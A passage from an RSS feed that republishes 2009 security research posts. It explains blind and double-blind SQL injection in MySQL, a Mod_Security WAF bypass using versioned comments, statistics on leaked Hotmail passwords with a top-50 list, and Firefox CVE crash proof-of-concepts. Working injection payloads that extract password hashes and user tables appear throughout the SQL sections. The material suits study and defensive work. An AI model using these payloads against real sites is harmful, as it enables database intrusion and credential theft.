called blind. It should be mentioned that it is precisely the technique of Blind SQL Injection exploitation that allows one to bypass most filters (including WAFs) easily. Blind SQL Injection. Blind SQL Injection appears when the vulnerable query affects the application logic but doesn't allow one to output any data into the page returned by the web application. Here is an example of vulnerable PHP code containing a Blind SQL Injection vulnerability. The capabilities of Blind SQL Injection are comparable with those of the classical technique. Just like the classical technique, Blind SQL Injection exploitation allows one to write and read files and get data from tables, only the entries are read symbol by symbol. Standard blind exploitation is based on the analysis of a true/false logical expression. If the expression is true, the web application returns certain content, and if it is false, the application returns other content. If we consider the difference between the outputs for true and false statements in the query, we will be able to conduct a symbol-by-symbol search for data in a table or a file. Here is an example of exploiting the vulnerability in the code given above: id=1 and 555=if(ord(mid((select pass from users limit 0,1),1,1))=97,555,777). If the table users contains a column pass and the first symbol of the first entry in this column has code 97 (the symbol 'a'), then MySQL will return TRUE and the query will be true. Otherwise it will return FALSE and the page will display 'error' for the code given above. The described technique had been applied for a long time, but the situation changed radically when issues X07'09 and X09'09 of the Russian magazine Hacker were published. The information security researcher Qwazar described new approaches to Blind SQL Injection exploitation. The first proposed technique consists in using incorrect regular expressions that cause various error reactions from MySQL during execution of the select query (in the course of SQL query execution, not at the stage of checking its syntax). Qwazar demonstrated that this approach, combined with the method proposed by Elekt (select 1 union select 2), allows one to find up to 12 characters with one query to the web application. The attack query has the following form. Thus, if the table users contains a column pass and the first symbol of the first entry in this column is 0, then MySQL will return the error message 1139 - Got error 'invalid repetition count(s)' from regexp. If the first symbol in the column pass is 1, then the error message 1139 - Got error 'braces not balanced' from regexp will be received, etc. Another approach to speeding up exploitation of Blind SQL Injection demonstrated by Qwazar (X09'09) consists in using MySQL error messages as containers for useful data (a real breakthrough in the field of Blind SQL Injection exploitation). For example, the following query: id=1 union select * from (select * from (select name_const((select pass from users limit 1),14) d) as t join (select name_const((select pass from users limit 1),14) e) b) a will return an error message containing useful data from the column pass (e.g. an MD5 hash): 1060 - Duplicate column name 'f8d80def69dc3ee86c5381219e4c5c80'. With this method one can get up to 64 bytes of useful data with one query to the web application. The string concatenation functions concat() and concat_ws() allow one to make an effective and quick dump of the whole table. Unfortunately, the given trick with the function name_const() gives results only for MySQL versions 5.0.12-5.0.64. The idea of finding a substitute for the function name_const() was pursued, and another useful function, ExtractValue(), which appeared in MySQL version 5.1.5, was discovered. This function is meant for extracting data from an XML document. However, it also has another pretty hacker application :) For example, the following query: id=1 and ExtractValue(1,concat(0x5C,(select pass from users limit 0,1))) will return the error message XPATH syntax error: '\f8d80def69dc3ee86c5381219e4c5c8'. Thus we can read data from the table using Blind SQL Injection exploitation (MySQL v5.1.5 and later) with a restriction of 31 useful bytes per query to the web application. (The XPATH syntax error is related to the incorrect regular expression.) Note: when the article was published, Qwazar offered a more interesting method to exploit Blind SQL Injection, to which all MySQL versions later than 4.1.x are susceptible. Unfortunately, all the described methods can be applied only if MySQL error messages are placed into the body of the returned page, which isn't always true. Well, what of that? Do we have to use tedious techniques of symbol-by-symbol search again? Not always! One can often find an SQL Injection vulnerability in a numeric parameter of the web application; the web application will return different content depending on the specified number. If we correlate these numbers with the content and map them onto the set of symbols being searched, we will be able to read data from the table very effectively. For example: News title 111, identifier in the parameter id 3245, the symbol being searched is 0; News title 222, identifier in the parameter id 2456, the symbol being searched is 1; News title 333, identifier in the parameter id 4562, the symbol being searched is 2; etc. Here is an example of an attack query (e.g. meant for accurate identification of the first symbol of an MD5 hash). It should be mentioned that with this method the length of the HTTP request cannot exceed 8192 bytes. In other respects, the method is rather effective when MySQL error messages are not displayed in the returned page. In addition, the method is universal and doesn't depend on the database being used. Proof-of-concept code is linked from the original post. Double Blind SQL Injection. Sometimes not only are all error messages excluded from the page returned by the web application, but the vulnerable query itself is used only for certain internal purposes. For example, it can serve for event logging or internal optimization. These SQL Injection vulnerabilities belong to the Double Blind class. Exploitation of this group of SQL Injections is based on the analysis of time delays between sending a query to the web application and receiving its answer. In the classical approach the function benchmark() is applied. However, the function sleep() represents a better and safer alternative, because it doesn't consume the server's processor resources as benchmark() does. Here is an example of a simple implementation of symbol-by-symbol search based on the analysis of time delays. As one can see, alphabetical order is used in the array $b_srt to find data. The script sequentially checks every symbol from the array for coincidence with a symbol from the database. One can speed up the process by arranging the symbols in a more favourable order or by using a binary tree. It should be mentioned that the application of binary trees requires the use of the symbols &lt; and &gt;, which is not always possible, because these symbols are often converted to their HTML equivalents. As for the favourable search order, the work of d0znp can be found in Hacker (the Russian magazine) for December 2009, and soon it will be available in English in the white papers at milw0rm.com.</description><link>http://www.secuobs.com/revue/news/175550.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/175550.shtml</guid></item>
<item><title>Password analysis for Windows Live Hotmail users</title><description>Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - There is news again that a user account database is available on the Internet. This time it concerns Windows Live Mail users. The source says that more than 10000 passwords of Hotmail user accounts are publicly accessible. I could not miss it, and brief googling led me to the true origin. The pastebin.com server is now operating unstably, but the Google cache works perfectly. So, firstly, the list of published and sorted (without repetitions) accounts includes only accounts that start with the letters 'a' and 'b'. It means that the full list of users is much bigger than the published list. If we assume that there are about 4000-5000 accounts for every letter of the English alphabet, it's easy to calculate that the full list of compromised accounts could reach 150000. Secondly, only 9238 of the 10028 published accounts are legitimate. If we also consider Hotmail's restriction policy, which requires a password length of no less than 6 characters, only 8250 accounts are legitimate. Here are the results for the character sets used across the whole password list. This is the same diagram, taking the Hotmail password policy into account. As you can see, the graphs are almost identical. Compared with similar data on corporate users [1] and user passwords from the VKontakte social network [2], the diagram is as follows. And this is a diagram by password length. Assuming that most Hotmail users are foreign Internet users, we can see the difference in how Russian and foreign users choose passwords. Our nationals prefer numerals, but foreign users prefer lower-case English letters. On the other hand, Russian users choose longer passwords. Here is the TOP 50 of the most widespread passwords for Hotmail user accounts: 1. 123456, 2. 123456789, 3. alejandra, 4. 111111, 5. alejandro, 6. tequiero, 7. 12345678, 8. 1234567, 9. alberto, 10. daniel, 11. 000000, 12. ESTRELLA, 13. beatriz, 14. roberto, 15. sebastian, 16. andrea, 17. iloveyou, 18. bonita, 19. felicidad, 20. 555555, 21. amigos, 22. brujita, 23. america, 24. arturo, 25. Princesa, 26. 666666, 27. BETITO, 28. mariposa, 29. 777777, 30. ricardo, 31. asdfgh, 32. rosita, 33. piscis, 34. caballo, 35. cristina, 36. gatito, 37. 112233, 38. angelica, 39. junior, 40. 123123, 41. barbara, 42. libertad, 43. adriana, 44. angelito, 45. carolina, 46. 654321, 47. felipe, 48. ximena, 49. paloma, 50. Esperanza. If we analyze the list of the most widespread passwords in Hotmail accounts, we can see that very often the user's name is used as the password. However, the numeral combinations 123456, 1234567, 12345678 and 123456789 are in the TOP 10, just as in the password statistics for Russian companies. They are considered the leaders among the most favourite passwords of users all over the world.</description><link>http://www.secuobs.com/revue/news/157741.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157741.shtml</guid></item>
<item><title>Another fine method to exploit SQL Injection and bypass WAF</title><description>Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - A method that I discovered today in the MySQL documentation struck me with its simplicity and the fact that I hadn't noticed it before. Let me describe this method of bypassing a WAF. MySQL servers allow one to use comments of the following type: /*!sql-code*/ and /*!12345sql-code*/. As can be noticed, the SQL code will be executed from the comment in both cases. The latter construction means that sql-code should be executed only if the DBMS version is later than the given value. As I have repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs is the latest stable build of Mod_Security (v 2.5.9). Here is a simple example: $query = "SELECT name FROM table where id = ".$_GET['id']; $result = mysql_query($query); If a web application is protected with Mod_Security, then the following request will be forbidden: id=1 union select 1. It is remarkable that even these requests (which are incorrect in the considered example) will also be forbidden by the WAF (HPP/HPF techniques): id=1 union/*&amp;id=*/select table_name from information_schema.columns and id=1 union/*blabla1*/select table_name/*blabla2*/from information_schema.columns. But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection: id=1/*!limit 0*/union select concat_ws(0x3a,table_name,column_name) from information_schema.columns; id=1/*!12345limit 0*/union select concat_ws(0x3a,table_name,column_name) from information_schema.columns; id=1/*!limit 0*/union select concat_ws(0x3a,username,password,email) from users. Well, one more method for our arsenal ;-)</description><link>http://www.secuobs.com/revue/news/157740.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157740.shtml</guid></item>
<item><title>Mozilla Firefox Proof-of-Concept (PoC) codes</title><description>Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - On October 27, Mozilla developers fixed several vulnerabilities in the browser engine used in Firefox and other Mozilla-based products. The vulnerabilities were fixed in versions 3.0.15 and 3.5.4. CVE references: CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383. Complete list of Proof-of-Concept codes (crash triggers): 1) CVE-2009-3382: the CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames. PoC: a page whose stylesheet floats div:first-letter to the right, with a JavaScript function doe2() that, rescheduled via setTimeout(doe2, 500), sets the style attribute of element 'a' to 'display: -moz-box' and the display of element 'c' to 'none' (the PoC source is not legibly preserved in this feed). 2) CVE-2009-1563: an array indexing error in NSPR's Balloc() leads to a floating point memory vulnerability. Secunia Research details: the s2b() function takes the total number of digits and determines the first number K for which (1 &lt;&lt; K) &gt;= (numdigits + 8) / 9. K is then passed to Balloc() to allocate memory. Balloc() dereferences the static freelist buffer of 16 elements using K as an index. If K is above 15, malformed pointers following the freelist array will be returned from Balloc(): #define Kmax 15; static Bigint *freelist[Kmax+1]; Balloc(k) { ... if ((rv = freelist[k])) { freelist[k] = rv->next; } ... return rv; }. For e.g. K = 17, a pointer to a limited heap buffer is returned from Balloc() and used to hold the converted big number. This results in a heap-based buffer overflow, followed by a call to a function grabbed from a corrupted pointer to a virtual function table. This results in the execution of an arbitrary address when paired with heap spraying. PoC (1): https://bugzilla.mozilla.org/attachment.cgi?id=400490; PoC (2), Secunia: https://bugzilla.mozilla.org/attachment.cgi?id=400493; PoC (3): https://bugzilla.mozilla.org/attachment.cgi?id=406726. 3) CVE-2009-3375: Cross-origin data theft through document.getSelection(). PoC: select the destination for the iframe and select 'go'. Make a text selection and the content should be displayed in an alert box. https://bug503226.bugzilla.mozilla.org/attachment.cgi?id=387576 4) CVE-2009-3378: Crash while loading an ogg video. The oggplay_data_handle_theora_frame function (media/liboggplay/src/liboggplay/oggplay_data.c) in liboggplay attempts to reuse an earlier frame data structure upon encountering a decoding error for the first frame, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a crafted ogg video file. PoC: https://bugzilla.mozilla.org/show_bug.cgi?id=500311 (crash PoC video). 5) CVE-2009-3371: Crash with recursive web-worker calls. A use-after-free vulnerability allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively. PoC: https://bugzilla.mozilla.org/attachment.cgi?id=398496</description><link>http://www.secuobs.com/revue/news/157739.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157739.shtml</guid></item>
</channel>
</rss>
 
